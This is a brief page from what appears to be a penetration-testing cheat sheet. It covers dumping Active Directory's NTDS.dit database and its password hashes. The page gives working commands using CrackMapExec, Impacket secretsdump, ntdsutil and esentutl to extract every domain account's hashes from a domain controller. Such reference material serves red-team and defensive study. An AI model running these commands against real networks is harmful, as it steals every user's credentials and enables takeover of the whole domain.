NTDS

The NTDS.dit file (NTDS) is a database which stores confidential Active Directory information such as usernames, objects, groups, and password hashes. Once the NTDS.dit file has been retrieved, an attacker can effectively impersonate any member of the domain. This file is stored on domain controllers, meaning that full domain compromise has to occur in order to retrieve it.

Exploitation

CrackMapExec and Impacket are the easiest ways to remotely dump the NTDS.dit after Domain Administrator credentials have been obtained:

# CrackMapExec
crackmapexec smb -u $user -p $password -ntds 

# Impacket
impacket-secretsdump -just-dc-ntlm oasis/administrator@$dcip

Alternatively, an attacker can dump the NTDS.dit manually if they have a shell on a Domain Controller:

# Dump the NTDS
# It should be noted that this works on older machines when Secretsdump and vssadmin fail
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

# Dump the password hashes offline 
impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

# LOLBIN 
esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\Windows\Tasks\ntds.dit

References

Dumping Domain Controller Hashes Locally and RemotelyRed Teaming Experiments

PreviousLSASS Memory NextSecurity Account Manager (SAM)

Last updated 1 year ago